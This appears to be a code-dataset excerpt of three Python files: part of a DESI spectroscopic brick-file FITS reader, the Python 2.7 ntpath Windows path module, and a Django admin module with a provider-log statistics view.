# Create an HDU4 using the columns from fibermap with a few extras added.
columns = desispec.io.fibermap.fibermap_columns[:]
columns.extend([
('NIGHT','i4'),
('EXPID','i4'),
('INDEX','i4'),
])
data = np.empty(shape = (0,),dtype = columns)
hdr = desispec.io.util.fitsheader(header)
#- ignore incorrect and harmless fits TDIM7 warning for
#- FILTER column that is a 2D array of strings
with warnings.catch_warnings():
warnings.simplefilter('ignore')
hdu4 = astropy.io.fits.BinTableHDU(data=data, header=hdr, name='FIBERMAP')
# Add comments for fibermap columns.
num_fibermap_columns = len(desispec.io.fibermap.fibermap_comments)
for i in range(1,1+num_fibermap_columns):
key = 'TTYPE%d' % i
name = hdu4.header[key]
comment = desispec.io.fibermap.fibermap_comments[name]
hdu4.header[key] = (name,comment)
# Add comments for our additional columns.
hdu4.header['TTYPE%d' % (1+num_fibermap_columns)] = ('NIGHT','Night of exposure YYYYMMDD')
hdu4.header['TTYPE%d' % (2+num_fibermap_columns)] = ('EXPID','Exposure ID')
hdu4.header['TTYPE%d' % (3+num_fibermap_columns)] = ('INDEX','Index of this object in other HDUs')
self.hdu_list = astropy.io.fits.HDUList([hdu0,hdu1,hdu2,hdu3,hdu4])
else:
self.hdu_list = astropy.io.fits.open(path,mode = self.mode)
try:
self.brickname = self.hdu_list[0].header['BRICKNAM']
self.channel = self.hdu_list[0].header['CHANNEL']
except KeyError:
self.channel, self.brickname = _parse_brick_filename(path)
def add_objects(self,flux,ivar,wave,resolution):
"""Add a list of objects to this brick file from the same night and exposure.
Args:
flux(numpy.ndarray): Array of (nobj,nwave) flux values for nobj objects tabulated at nwave wavelengths.
ivar(numpy.ndarray): Array of (nobj,nwave) inverse-variance values.
wave(numpy.ndarray): Array of (nwave,) wavelength values in Angstroms. All objects are assumed to use the same wavelength grid.
resolution(numpy.ndarray): Array of (nobj,nres,nwave) resolution matrix elements.
Raises:
RuntimeError: Can only add objects in update mode.
"""
if self.mode != 'update':
raise RuntimeError('Can only add objects in update mode.')
# Concatenate the new per-object image HDU data or use it to initialize the HDU.
# HDU2 contains the wavelength grid shared by all objects so we only add it once.
if self.hdu_list[0].data is not None:
self.hdu_list[0].data = np.concatenate((self.hdu_list[0].data,flux,))
self.hdu_list[1].data = np.concatenate((self.hdu_list[1].data,ivar,))
assert np.array_equal(self.hdu_list[2].data,wave),'Wavelength arrays do not match.'
self.hdu_list[3].data = np.concatenate((self.hdu_list[3].data,resolution,))
else:
self.hdu_list[0].data = flux
self.hdu_list[1].data = ivar
self.hdu_list[2].data = wave
self.hdu_list[3].data = resolution
def get_wavelength_grid(self):
"""Return the wavelength grid used in this brick file.
"""
return self.hdu_list[2].data
def get_target(self,target_id):
"""Get the spectra and info for one target ID.
Args:
target_id(int): Target ID number to lookup.
Returns:
tuple: Tuple of numpy arrays (flux,ivar,resolution,info) of data associated
with this target ID. The flux,ivar,resolution arrays will have one entry
for each spectrum and the info array will have one entry per exposure.
The returned arrays are slices into the FITS file HDU data arrays, so this
call is relatively cheap (and any changes will be saved to the file if it
was opened in update mode.)
"""
exposures = (self.hdu_list[4].data['TARGETID'] == target_id)
index_list = np.unique(self.hdu_list[4].data['INDEX'][exposures])
return (self.hdu_list[0].data[index_list],self.hdu_list[1].data[index_list],
self.hdu_list[3].data[index_list],self.hdu_list[4].data[exposures])
def get_target_ids(self):
"""Return set of unique target IDs in this brick.
"""
return list(set(self.hdu_list[4].data['TARGETID']))
def get_num_spectra(self):
"""Get the number of spectra contained in this brick file.
Returns:
int: Number of objects contained in this brick file.
"""
return len(self.hdu_list[0].data)
def get_num_targets(self):
"""Get the number of distinct targets with at least one spectrum in this brick file.
Returns:
int: Number of unique targets represented with spectra in this brick file.
"""
return len(np.unique(self.hdu_list[4].data['TARGETID']))
def close(self):
"""Write any updates and close the brick file.
"""
if self.mode == 'update':
self.hdu_list.writeto(self.path,clobber = True)
self.hdu_list.close()
class Brick(BrickBase):
"""Represents the combined cframe exposures in a single brick and band.
See :class:`BrickBase` for constructor info.
"""
def __init__(self,path,mode = 'readonly',header = None):
BrickBase.__init__(self,path,mode,header)
def add_objects(self,flux,ivar,wave,resolution,object_data,night,expid):
"""Add a list of objects to this brick file from the same night and exposure.
Args:
flux(numpy.ndarray): Array of (nobj,nwave) flux values for nobj objects tabulated at nwave wavelengths.
ivar(numpy.ndarray): Array of (nobj,nwave) inverse-variance values.
wave(numpy.ndarray): Array of (nwave,) wavelength values in Angstroms. All objects are assumed to use the same wavelength grid.
resolution(numpy.ndarray): Array of (nobj,nres,nwave) resolution matrix elements.
object_data(numpy.ndarray): Record array of fibermap rows for the objects to add.
night(str): Date string for the night these objects were observed in the format YYYYMMDD.
expid(int): Exposure number for these objects.
Raises:
RuntimeError: Can only add objects in update mode.
"""
BrickBase.add_objects(self,flux,ivar,wave,resolution)
# Augment object_data with constant NIGHT and EXPID columns.
augmented_data = np.empty(shape = object_data.shape,dtype = self.hdu_list[4].data.dtype)
for column_def in desispec.io.fibermap.fibermap_columns:
name = column_def[0]
# Special handling for the fibermap FILTER array, which is not output correctly
# by astropy.io.fits so we convert it to a comma-separated list.
if name == 'FILTER' and augmented_data[name].shape != object_data[name].shape:
for i,filters in enumerate(object_data[name]):
augmented_data[name][i] = ','.join(filters)
else:
augmented_data[name] = object_data[name]
augmented_data['NIGHT'] = int(night)
augmented_data['EXPID'] = expid
begin_index = len(self.hdu_list[4].data)
end_index = begin_index + len(flux)
augmented_data['INDEX'] = np.arange(begin_index,end_index,dtype=int)
# Always concatenate to our table since a new file will be created with a zero-length table.
self.hdu_list[4].data = np.concatenate((self.hdu_list[4].data,augmented_data,))
class CoAddedBrick(BrickBase):
"""Represents the co-added exposures in a single brick and, possibly, a single band.
See :class:`BrickBase` for constructor info.
"""
def __init__(self,path,mode = 'readonly',header = None):
BrickBase.__init__(self,path,mode,header)
|
proxysh/Safejumper-for-Desktop
|
refs/heads/master
|
buildlinux/env32/local/lib/python2.7/ntpath.py
|
16
|
# Module 'ntpath' -- common operations on WinNT/Win95 pathnames
"""Common pathname manipulations, WindowsNT/95 version.
Instead of importing this module directly, import os and refer to this
module as os.path.
"""
import os
import sys
import stat
import genericpath
import warnings
from genericpath import *
__all__ = ["normcase","isabs","join","splitdrive","split","splitext",
"basename","dirname","commonprefix","getsize","getmtime",
"getatime","getctime", "islink","exists","lexists","isdir","isfile",
"ismount","walk","expanduser","expandvars","normpath","abspath",
"splitunc","curdir","pardir","sep","pathsep","defpath","altsep",
"extsep","devnull","realpath","supports_unicode_filenames","relpath"]
# strings representing various path-related bits and pieces
curdir = '.'
pardir = '..'
extsep = '.'
sep = '\\'
pathsep = ';'
altsep = '/'
defpath = '.;C:\\bin'
if 'ce' in sys.builtin_module_names:
defpath = '\\Windows'
elif 'os2' in sys.builtin_module_names:
# OS/2 w/ VACPP
altsep = '/'
devnull = 'nul'
# Normalize the case of a pathname and map slashes to backslashes.
# Other normalizations (such as optimizing '../' away) are not done
# (this is done by normpath).
def normcase(s):
"""Normalize case of pathname.
Makes all characters lowercase and all slashes into backslashes."""
return s.replace("/", "\\").lower()
# Return whether a path is absolute.
# Trivial in Posix, harder on the Mac or MS-DOS.
# For DOS it is absolute if it starts with a slash or backslash (current
# volume), or if a pathname after the volume letter and colon / UNC resource
# starts with a slash or backslash.
def isabs(s):
"""Test whether a path is absolute"""
s = splitdrive(s)[1]
return s != '' and s[:1] in '/\\'
# Join two (or more) paths.
def join(path, *paths):
"""Join two or more pathname components, inserting "\\" as needed."""
result_drive, result_path = splitdrive(path)
for p in paths:
p_drive, p_path = splitdrive(p)
if p_path and p_path[0] in '\\/':
# Second path is absolute
if p_drive or not result_drive:
result_drive = p_drive
result_path = p_path
continue
elif p_drive and p_drive != result_drive:
if p_drive.lower() != result_drive.lower():
# Different drives => ignore the first path entirely
result_drive = p_drive
result_path = p_path
continue
# Same drive in different case
result_drive = p_drive
# Second path is relative to the first
if result_path and result_path[-1] not in '\\/':
result_path = result_path + '\\'
result_path = result_path + p_path
return result_drive + result_path
# Split a path in a drive specification (a drive letter followed by a
# colon) and the path specification.
# It is always true that drivespec + pathspec == p
def splitdrive(p):
"""Split a pathname into drive and path specifiers. Returns a 2-tuple
"(drive,path)"; either part may be empty"""
if p[1:2] == ':':
return p[0:2], p[2:]
return '', p
# Parse UNC paths
def splitunc(p):
"""Split a pathname into UNC mount point and relative path specifiers.
Return a 2-tuple (unc, rest); either part may be empty.
If unc is not empty, it has the form '//host/mount' (or similar
using backslashes). unc+rest is always the input path.
Paths containing drive letters never have an UNC part.
"""
if p[1:2] == ':':
return '', p # Drive letter present
firstTwo = p[0:2]
if firstTwo == '//' or firstTwo == '\\\\':
# is a UNC path:
# vvvvvvvvvvvvvvvvvvvv equivalent to drive letter
# \\machine\mountpoint\directories...
# directory ^^^^^^^^^^^^^^^
normp = p.replace('\\', '/')
index = normp.find('/', 2)
if index <= 2:
return '', p
index2 = normp.find('/', index + 1)
# a UNC path can't have two slashes in a row
# (after the initial two)
if index2 == index + 1:
return '', p
if index2 == -1:
index2 = len(p)
return p[:index2], p[index2:]
return '', p
# Split a path in head (everything up to the last '/') and tail (the
# rest). After the trailing '/' is stripped, the invariant
# join(head, tail) == p holds.
# The resulting head won't end in '/' unless it is the root.
def split(p):
"""Split a pathname.
Return tuple (head, tail) where tail is everything after the final slash.
Either part may be empty."""
d, p = splitdrive(p)
# set i to index beyond p's last slash
i = len(p)
while i and p[i-1] not in '/\\':
i = i - 1
head, tail = p[:i], p[i:] # now tail has no slashes
# remove trailing slashes from head, unless it's all slashes
head2 = head
while head2 and head2[-1] in '/\\':
head2 = head2[:-1]
head = head2 or head
return d + head, tail
# Split a path in root and extension.
# The extension is everything starting at the last dot in the last
# pathname component; the root is everything before that.
# It is always true that root + ext == p.
def splitext(p):
return genericpath._splitext(p, sep, altsep, extsep)
splitext.__doc__ = genericpath._splitext.__doc__
# Return the tail (basename) part of a path.
def basename(p):
"""Returns the final component of a pathname"""
return split(p)[1]
# Return the head (dirname) part of a path.
def dirname(p):
"""Returns the directory component of a pathname"""
return split(p)[0]
# Is a path a symbolic link?
# This will always return false on systems where posix.lstat doesn't exist.
def islink(path):
"""Test for symbolic link.
On WindowsNT/95 and OS/2 always returns false
"""
return False
# alias exists to lexists
lexists = exists
# Is a path a mount point? Either a root (with or without drive letter)
# or an UNC path with at most a / or \ after the mount point.
def ismount(path):
"""Test whether a path is a mount point (defined as root of drive)"""
unc, rest = splitunc(path)
if unc:
return rest in ("", "/", "\\")
p = splitdrive(path)[1]
return len(p) == 1 and p[0] in '/\\'
# Directory tree walk.
# For each directory under top (including top itself, but excluding
# '.' and '..'), func(arg, dirname, filenames) is called, where
# dirname is the name of the directory and filenames is the list
# of files (and subdirectories etc.) in the directory.
# The func may modify the filenames list, to implement a filter,
# or to impose a different order of visiting.
def walk(top, func, arg):
"""Directory tree walk with callback function.
For each directory in the directory tree rooted at top (including top
itself, but excluding '.' and '..'), call func(arg, dirname, fnames).
dirname is the name of the directory, and fnames a list of the names of
the files and subdirectories in dirname (excluding '.' and '..'). func
may modify the fnames list in-place (e.g. via del or slice assignment),
and walk will only recurse into the subdirectories whose names remain in
fnames; this can be used to implement a filter, or to impose a specific
order of visiting. No semantics are defined for, or required of, arg,
beyond that arg is always passed to func. It can be used, e.g., to pass
a filename pattern, or a mutable object designed to accumulate
statistics. Passing None for arg is common."""
warnings.warnpy3k("In 3.x, os.path.walk is removed in favor of os.walk.",
stacklevel=2)
try:
names = os.listdir(top)
except os.error:
return
func(arg, top, names)
for name in names:
name = join(top, name)
if isdir(name):
walk(name, func, arg)
# Expand paths beginning with '~' or '~user'.
# '~' means $HOME; '~user' means that user's home directory.
# If the path doesn't begin with '~', or if the user or $HOME is unknown,
# the path is returned unchanged (leaving error reporting to whatever
# function is called with the expanded path as argument).
# See also module 'glob' for expansion of *, ? and [...] in pathnames.
# (A function should also be defined to do full *sh-style environment
# variable expansion.)
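# For example (assuming the environment variable HOME is set to
# C:\Users\me), the function below behaves roughly as follows:
#   expanduser('~\\foo')      -> 'C:\\Users\\me\\foo'
#   expanduser('~guido\\foo') -> 'C:\\Users\\guido\\foo'
#   expanduser('foo\\bar')    -> 'foo\\bar'   (unchanged: no leading '~')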
def expanduser(path):
"""Expand ~ and ~user constructs.
If user or $HOME is unknown, do nothing."""
if path[:1] != '~':
return path
i, n = 1, len(path)
while i < n and path[i] not in '/\\':
i = i + 1
if 'HOME' in os.environ:
userhome = os.environ['HOME']
elif 'USERPROFILE' in os.environ:
userhome = os.environ['USERPROFILE']
elif not 'HOMEPATH' in os.environ:
return path
else:
try:
drive = os.environ['HOMEDRIVE']
except KeyError:
drive = ''
userhome = join(drive, os.environ['HOMEPATH'])
if i != 1: #~user
userhome = join(dirname(userhome), path[1:i])
return userhome + path[i:]
# Expand paths containing shell variable substitutions.
# The following rules apply:
# - no expansion within single quotes
# - '$$' is translated into '$'
# - '%%' is translated into '%' if '%%' are not seen in %var1%%var2%
# - ${varname} is accepted.
# - $varname is accepted.
# - %varname% is accepted.
# - varnames can be made out of letters, digits and the characters '_-'
# (though is not verified in the ${varname} and %varname% cases)
# XXX With COMMAND.COM you can use any characters in a variable name,
# XXX except '^|<>='.
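# For example (assuming FOO is set to 'bar' and BAZ is unset), the function
# below behaves roughly as follows:
#   expandvars('$FOO %FOO% ${FOO}') -> 'bar bar bar'
#   expandvars('$BAZ and %BAZ%')    -> '$BAZ and %BAZ%'   (unknown: unchanged)
#   expandvars("'$FOO'")            -> "'$FOO'"           (single-quoted: unchanged)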
def expandvars(path):
"""Expand shell variables of the forms $var, ${var} and %var%.
Unknown variables are left unchanged."""
if '$' not in path and '%' not in path:
return path
import string
varchars = string.ascii_letters + string.digits + '_-'
if isinstance(path, unicode):
encoding = sys.getfilesystemencoding()
def getenv(var):
return os.environ[var.encode(encoding)].decode(encoding)
else:
def getenv(var):
return os.environ[var]
res = ''
index = 0
pathlen = len(path)
while index < pathlen:
c = path[index]
if c == '\'': # no expansion within single quotes
path = path[index + 1:]
pathlen = len(path)
try:
index = path.index('\'')
res = res + '\'' + path[:index + 1]
except ValueError:
res = res + path
index = pathlen - 1
elif c == '%': # variable or '%'
if path[index + 1:index + 2] == '%':
res = res + c
index = index + 1
else:
path = path[index+1:]
pathlen = len(path)
try:
index = path.index('%')
except ValueError:
res = res + '%' + path
index = pathlen - 1
else:
var = path[:index]
try:
res = res + getenv(var)
except KeyError:
res = res + '%' + var + '%'
elif c == '$': # variable or '$$'
if path[index + 1:index + 2] == '$':
res = res + c
index = index + 1
elif path[index + 1:index + 2] == '{':
path = path[index+2:]
pathlen = len(path)
try:
index = path.index('}')
var = path[:index]
try:
res = res + getenv(var)
except KeyError:
res = res + '${' + var + '}'
except ValueError:
res = res + '${' + path
index = pathlen - 1
else:
var = ''
index = index + 1
c = path[index:index + 1]
while c != '' and c in varchars:
var = var + c
index = index + 1
c = path[index:index + 1]
try:
res = res + getenv(var)
except KeyError:
res = res + '$' + var
if c != '':
index = index - 1
else:
res = res + c
index = index + 1
return res
# Normalize a path, e.g. A//B, A/./B and A/foo/../B all become A\B.
# Previously, this function also truncated pathnames to 8+3 format,
# but as this module is called "ntpath", that's obviously wrong!
def normpath(path):
"""Normalize path, eliminating double slashes, etc."""
# Preserve unicode (if path is unicode)
backslash, dot = (u'\\', u'.') if isinstance(path, unicode) else ('\\', '.')
if path.startswith(('\\\\.\\', '\\\\?\\')):
# in the case of paths with these prefixes:
# \\.\ -> device names
# \\?\ -> literal paths
# do not do any normalization, but return the path unchanged
return path
path = path.replace("/", "\\")
prefix, path = splitdrive(path)
# We need to be careful here. If the prefix is empty, and the path starts
# with a backslash, it could either be an absolute path on the current
# drive (\dir1\dir2\file) or a UNC filename (\\server\mount\dir1\file). It
# is therefore imperative NOT to collapse multiple backslashes blindly in
# that case.
# The code below preserves multiple backslashes when there is no drive
# letter. This means that the invalid filename \\\a\b is preserved
# unchanged, where a\\\b is normalised to a\b. It's not clear that there
# is any better behaviour for such edge cases.
if prefix == '':
# No drive letter - preserve initial backslashes
while path[:1] == "\\":
prefix = prefix + backslash
path = path[1:]
else:
# We have a drive letter - collapse initial backslashes
if path.startswith("\\"):
prefix = prefix + backslash
path = path.lstrip("\\")
comps = path.split("\\")
i = 0
while i < len(comps):
if comps[i] in ('.', ''):
del comps[i]
elif comps[i] == '..':
if i > 0 and comps[i-1] != '..':
del comps[i-1:i+1]
i -= 1
elif i == 0 and prefix.endswith("\\"):
del comps[i]
else:
i += 1
else:
i += 1
# If the path is now empty, substitute '.'
if not prefix and not comps:
comps.append(dot)
return prefix + backslash.join(comps)
# Return an absolute path.
try:
from nt import _getfullpathname
except ImportError: # not running on Windows - mock up something sensible
def abspath(path):
"""Return the absolute version of a path."""
if not isabs(path):
if isinstance(path, unicode):
cwd = os.getcwdu()
else:
cwd = os.getcwd()
path = join(cwd, path)
return normpath(path)
else: # use native Windows method on Windows
def abspath(path):
"""Return the absolute version of a path."""
if path: # Empty path must return current working directory.
try:
path = _getfullpathname(path)
except WindowsError:
pass # Bad path - return unchanged.
elif isinstance(path, unicode):
path = os.getcwdu()
else:
path = os.getcwd()
return normpath(path)
# realpath is a no-op on systems without islink support
realpath = abspath
# Win9x family and earlier have no Unicode filename support.
supports_unicode_filenames = (hasattr(sys, "getwindowsversion") and
sys.getwindowsversion()[3] >= 2)
def _abspath_split(path):
abs = abspath(normpath(path))
prefix, rest = splitunc(abs)
is_unc = bool(prefix)
if not is_unc:
prefix, rest = splitdrive(abs)
return is_unc, prefix, [x for x in rest.split(sep) if x]
def relpath(path, start=curdir):
"""Return a relative version of a path"""
if not path:
raise ValueError("no path specified")
start_is_unc, start_prefix, start_list = _abspath_split(start)
path_is_unc, path_prefix, path_list = _abspath_split(path)
if path_is_unc ^ start_is_unc:
raise ValueError("Cannot mix UNC and non-UNC paths (%s and %s)"
% (path, start))
if path_prefix.lower() != start_prefix.lower():
if path_is_unc:
raise ValueError("path is on UNC root %s, start on UNC root %s"
% (path_prefix, start_prefix))
else:
raise ValueError("path is on drive %s, start on drive %s"
% (path_prefix, start_prefix))
# Work out how much of the filepath is shared by start and path.
i = 0
for e1, e2 in zip(start_list, path_list):
if e1.lower() != e2.lower():
break
i += 1
rel_list = [pardir] * (len(start_list)-i) + path_list[i:]
if not rel_list:
return curdir
return join(*rel_list)
try:
# The genericpath.isdir implementation uses os.stat and checks the mode
# attribute to tell whether or not the path is a directory.
# This is overkill on Windows - just pass the path to GetFileAttributes
# and check the attribute from there.
from nt import _isdir as isdir
except ImportError:
# Use genericpath.isdir as imported above.
pass
|
gis4dis/poster
|
refs/heads/master
|
apps/importing/admin.py
|
1
|
import logging
from functools import update_wrapper
from django.contrib import admin
from django.db.models import Count, DateTimeField, Min, Max
from django.db.models.functions import Trunc
from .models import Provider, ProviderLog, ReadonlyProviderLog
logger = logging.getLogger(__name__)
# noinspection PyAttributeOutsideInit,PyUnresolvedReferences
class FieldsMixin(object):
def add_view(self, request, form_url='', extra_context=None):
try:
if hasattr(self, 'add_fields'):
self.fields = self.add_fields
elif hasattr(self, 'default_fields'):
self.fields = self.default_fields
elif hasattr(self, 'fields'):
del self.fields
except Exception as e:
logger.debug(e, exc_info=True)
try:
if hasattr(self, 'add_readonly_fields'):
self.readonly_fields = self.add_readonly_fields
elif hasattr(self, 'default_readonly_fields'):
self.readonly_fields = self.default_readonly_fields
elif hasattr(self, 'readonly_fields'):
del self.readonly_fields
except Exception as e:
logger.debug(e, exc_info=True)
return super(FieldsMixin, self).add_view(request, form_url, extra_context)
def change_view(self, request, object_id, form_url='', extra_context=None):
try:
if hasattr(self, 'change_fields'):
self.fields = self.change_fields
elif hasattr(self, 'default_fields'):
self.fields = self.default_fields
elif hasattr(self, 'fields'):
del self.fields
except Exception as e:
logger.debug(e, exc_info=True)
try:
if hasattr(self, 'change_readonly_fields'):
self.readonly_fields = self.change_readonly_fields
elif hasattr(self, 'default_readonly_fields'):
self.readonly_fields = self.default_readonly_fields
elif hasattr(self, 'readonly_fields'):
del self.readonly_fields
except Exception as e:
logger.debug(e, exc_info=True)
return super(FieldsMixin, self).change_view(request, object_id, form_url, extra_context)
class ProviderAdmin(FieldsMixin, admin.ModelAdmin):
list_display = ['name', 'code']
fields = ['name', 'code']
readonly_fields = ['token', 'url']
add_fields = fields
change_fields = fields + readonly_fields
class ProviderLogAdmin(FieldsMixin, admin.ModelAdmin):
list_display = ['provider', 'content_type', 'received_time', 'is_valid', ]
list_filter = ['provider__name', 'content_type', 'received_time', 'is_valid', ]
fields = ['provider', 'content_type', 'body', ('file_name', 'ext'), 'file_path', 'received_time', 'is_valid', 'uuid4', ]
readonly_fields = ['uuid4', ]
# https://medium.com/@hakibenita/how-to-turn-django-admin-into-a-lightweight-dashboard-a0e0bbf609ad
# Wonderful way to add some graphs :)
# noinspection PyProtectedMember
class ReadonlyProviderLogAdmin(FieldsMixin, admin.ModelAdmin):
change_list_template = 'admin/readonly_provider_change_list.html'
date_hierarchy = 'received_time'
list_display = ['provider', 'content_type', 'received_time', 'is_valid', ]
list_filter = ['received_time', 'provider__name', 'content_type', 'is_valid', ]
default_fields = ['provider', 'content_type', 'file_name', 'file_path', 'ext', 'received_time', 'is_valid', 'uuid4', 'parsed_body']
default_readonly_fields = []
add_fields = ['provider', 'content_type', 'body', 'file_name', 'ext', 'received_time', 'is_valid', ]
change_fields = ['provider', 'content_type', ('file_name', 'ext'), 'file_path', 'received_time', 'is_valid', 'uuid4', 'parsed_body']
change_readonly_fields = ['provider', 'content_type', 'file_name', 'ext', 'file_path', 'received_time', 'is_valid', 'uuid4', 'parsed_body']
def stats_view(self, request, extra_context=None):
def get_next_in_date_hierarchy(req, date_hierarchy):
if date_hierarchy + '__day' in req.GET:
return 'hour'
if date_hierarchy + '__month' in req.GET:
return 'day'
if date_hierarchy + '__year' in req.GET:
return 'month'
return 'month'
response = self.changelist_view(request, extra_context)
response.template_name = 'admin/readonly_provider_log_summary_change_list.html'
try:
qs = response.context_data['cl'].queryset
except (AttributeError, KeyError):
return response
metrics = {
'total': Count('id'),
}
summary = list(
qs.values('provider__name')
.annotate(**metrics)
.order_by('-total')
)
response.context_data['summary'] = summary
summary_total = dict(
qs.aggregate(**metrics)
)
response.context_data['summary_total'] = summary_total
period = get_next_in_date_hierarchy(
request,
self.date_hierarchy,
)
response.context_data['period'] = period
summary_over_time = qs.annotate(
period=Trunc(
'received_time',
period,
output_field=DateTimeField(),
),
) \
.values('period') \
.annotate(total=Count('id')) \
.order_by('period')
summary_range = summary_over_time.aggregate(
low=Min('total'),
high=Max('total'),
)
high = summary_range.get('high', 0)
low = summary_range.get('low', 0)
response.context_data['summary_over_time'] = [
{
'period': x['period'],
'total': x['total'] or 0,
'pct':
((x['total'] or 0) / high) * 100
if high > low else 100,
} for x in summary_over_time]
return response
def get_urls(self):
urlpatterns = super(ReadonlyProviderLogAdmin, self).get_urls()
from django.conf.urls import url
def wrap(view):
def wrapper(*args, **kwargs):
return self.admin_site.admin_view(view)(*args, **kwargs)
wrapper.model_admin = self
return update_wrapper(wrapper, view)
info = self.model._meta.app_label, self.model._meta.model_name
urlpatterns = [
url(r'^statistics/$', wrap(self.stats_view), name='%s_%s_statistics' % info),
] + urlpatterns
return urlpatterns
admin.site.register(Provider, ProviderAdmin)
admin.site.register(ProviderLog, ProviderLogAdmin)
admin.site.register(ReadonlyProviderLog, ReadonlyProviderLogAdmin)
|